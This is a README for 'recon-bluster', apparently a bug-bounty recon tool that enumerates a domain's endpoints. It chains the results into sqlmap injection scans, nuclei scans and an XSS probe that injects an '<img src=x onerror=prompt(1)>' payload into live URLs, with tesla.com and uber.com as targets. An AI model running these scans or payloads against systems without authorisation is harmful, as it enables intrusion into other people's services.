Summary

recon-bluster is an automated recon tool that works from a target domain. It combines a set of the best recon tools to enumerate endpoints and generate a list of target endpoints for further vulnerability scanning. It supports multi-threading for concurrent recon of multiple targets.

Recon Workflow

[Image: recon workflow diagram]

Installation

git clone https://github.com/superzerosec/recon-bluster.git
cd recon-bluster
bash install.sh

Usage

usage: recon-bluster.py [-h] [-d DOMAIN] [-l LIST] [-t THREAD] [-i]

optional arguments:
  -h, --help            show this help message and exit
  -d DOMAIN, --domain DOMAIN
                        Target domain
  -l LIST, --list LIST  List of target domain saperated with new line
  -t THREAD, --thread THREAD
                        Number of thread, default 5
  -i, --intel           Amass intel recon, default False

Run recon on a single target, tesla.com:

python3 recon-bluster.py -d tesla.com

For multiple targets, create a file list.txt with one domain per line:

bugcrowd.com
tesla.com
uber.com

Run recon on the multiple targets in list.txt:

python3 recon-bluster.py -l list.txt

Tools Chaining

SQLMAP

TARGET=tesla.com; python3 recon-bluster.py -d $TARGET; sqlmap -m $TARGET/target_sqli.txt --random-agent --batch

NUCLEI

TARGET=tesla.com; python3 recon-bluster.py -d $TARGET; nuclei -silent -l $TARGET/subdomains_httpx.txt -jsonl -o $TARGET/subdomains_nuclei_vulnerabilities_$(date +%Y-%m-%d_%H:%M:%S).json -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36" --severity low,medium,high,critical
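The nuclei command above writes one JSON object per line (-jsonl). The following is an added example, not part of recon-bluster, for triaging that file: it de-duplicates findings, orders them by severity, and tolerates truncated lines. The function names are hypothetical and the sample lines and hostnames are constructed.

```python
import json
from collections import Counter

SEVERITY_ORDER = ["critical", "high", "medium", "low", "info", "unknown"]

# Constructed sample in nuclei's JSONL shape (one JSON object per line); not real scan output.
SAMPLE_JSONL = """\
{"template-id": "example-missing-header", "info": {"name": "Example Missing Header", "severity": "low"}, "host": "https://a.example.com", "matched-at": "https://a.example.com/"}
{"template-id": "example-exposed-panel", "info": {"name": "Example Exposed Panel", "severity": "high"}, "host": "https://b.example.com", "matched-at": "https://b.example.com/admin"}
{"template-id": "example-missing-header", "info": {"name": "Example Missing Header", "severity": "low"}, "host": "https://a.example.com", "matched-at": "https://a.example.com/"}
this line is truncated {"template-id":

{"template-id": "example-no-severity", "info": {"name": "No Severity"}, "host": "https://c.example.com"}
"""


def parse_findings(text):
    """Return (unique findings sorted by severity, count of unparseable lines)."""
    seen, bad = set(), 0
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            bad += 1  # e.g. a line cut short by an interrupted scan
            continue
        if not isinstance(rec, dict):
            bad += 1
            continue
        info = rec.get("info") if isinstance(rec.get("info"), dict) else {}
        sev = str(info.get("severity", "unknown")).lower()
        if sev not in SEVERITY_ORDER:
            sev = "unknown"
        where = rec.get("matched-at") or rec.get("host") or "?"
        seen.add((sev, str(rec.get("template-id", "?")), str(where)))
    findings = sorted(seen, key=lambda f: (SEVERITY_ORDER.index(f[0]), f[1], f[2]))
    return findings, bad


def severity_counts(findings):
    """Count unique findings per severity label."""
    return Counter(sev for sev, _, _ in findings)


if __name__ == "__main__":
    findings, bad = parse_findings(SAMPLE_JSONL)
    for sev, template, where in findings:
        print(f"{sev:8} {template:28} {where}")
    print(dict(severity_counts(findings)), "unparseable lines:", bad)
```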

AIRIXSS

TARGET=tesla.com; python3 recon-bluster.py -d $TARGET; cat $TARGET/target_xss.txt | qsreplace '"><img src=x onerror=prompt(1)>' | airixss -payload '<img src=x onerror=prompt(1)>' | grep "31mVulnerable" | anew target_xss_airixss.txt

SMAP

TARGET=tesla.com; python3 recon-bluster.py -d $TARGET; smap -iL $TARGET/subdomains.txt -oG $TARGET/subdomains_smap.txt

WAYMORE

TARGET=tesla.com; python3 ~/tools/waymore/waymore.py -mode U -i $TARGET; cat ~/tools/waymore/results/$TARGET/waymore.txt | anew $TARGET/subdomains_urls_waymore.txt > $TARGET/subdomains_urls_waymore_new.txt

Credit

Special Thanks